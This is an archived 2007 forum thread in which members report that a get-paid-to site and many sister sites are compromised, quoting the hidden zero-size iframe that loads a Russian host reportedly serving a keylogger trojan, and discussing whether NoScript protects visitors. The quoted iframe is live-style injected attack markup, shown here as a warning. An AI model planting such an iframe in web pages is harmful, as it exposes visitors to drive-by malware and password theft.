Help - Search - Members - Calendar
Full Version: The Kerosene Cucumber [In List]
Get Paid Forum - Get Paid Discussion > Get Paid To Programs > Sites Allegedly with problems of hacking/virus/0-iframes, autosearches etc ... > Sites hit by virusses or hacked
aloralyric
Jan 23 2007, 06:24 PM
CODE
http://www.thekerosenecucumber.com

I see at least three stelaartois codes on this site:
CODE
<IFRAME name='StatPage' src='http://stelaartois.ru/index2.php' width=5 height=5 style='display:none'></IFRAME>
<IFRAME name='StatPage' src='http://stelaartois.ru/index2.php' width=5 height=5 style='display:none'></IFRAME>
<IFRAME name='StatPage' src='http://stelaartois.ru/index2.php' width=5 height=5 style='display:none'></IFRAME>
wagdoll
Jan 23 2007, 07:09 PM
At least a few of Genelle's other sites are also affected, I know purringemails, littlest penguins also have this but haven't checked any others.
pancra
Jan 23 2007, 07:27 PM
Sugarlandcash has it too.
wagdoll
Jan 23 2007, 08:48 PM
I just went through about 40 of Genelle's sites and sites associated with her (I think one is her host, pacwest something), too many to post here but almost every one of them has it.

Edit, that's pactech-hosting not pacwest ap.gif
Bluedahlia
Jan 23 2007, 09:30 PM
QUOTE(wagdoll @ Jan 23 2007, 09:48 PM) [snapback]4631774[/snapback]
I just went through about 40 of Genelle's sites and sites associated with her (I think one is her host, pacwest something), too many to post here but almost every one of them has it.

Edit, that's pactech-hosting not pacwest ap.gif



What does this virus do. I'm a member of Kerosene and have FF with no script and haven't had any virus warnings from AVG. Should I scan my computer?
sophieca
Jan 24 2007, 03:21 AM
Hi,

From what I know it does more or less the same as dodgenitro :
From wagdoll posted here
QUOTE
Part of the reason this hacker puts the code on sites is to give out a keylogger trojan to collect egold and possibly other passwords/information - this is not just an annoyance but could be worse consequences for anyone who comes across a site while the malicious code is present.


You'll find some basic infos and interesting links to know more here

I have FF and NoScript and see sites with stelaartois regularly, apparently it doesn't harm me but I still scan regularly tho, don't quote me on this tho, am not techie enough.

Sophie
Bluedahlia
Jan 24 2007, 10:54 AM
QUOTE(sophieca @ Jan 24 2007, 04:21 AM) [snapback]4631950[/snapback]
Hi,

From what I know it does more or less the same as dodgenitro :
From wagdoll posted here
You'll find some basic infos and interesting links to know more here

I have FF and NoScript and see sites with stelaartois regularly, apparently it doesn't harm me but I still scan regularly tho, don't quote me on this tho, am not techie enough.

Sophie


Thanks Sophie. ci.gif
wagdoll
Jan 24 2007, 01:25 PM
The malicious code is hidden inside javascript so the noscript should protect you as it will stop anything inside the javascript from running.
Bluedahlia
Jan 24 2007, 01:46 PM
QUOTE(wagdoll @ Jan 24 2007, 02:25 PM) [snapback]4632166[/snapback]
The malicious code is hidden inside javascript so the noscript should protect you as it will stop anything inside the javascript from running.


Thanks Wagdoll. aa.gif
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
Invision Power Board © 2001-2012 Invision Power Services, Inc.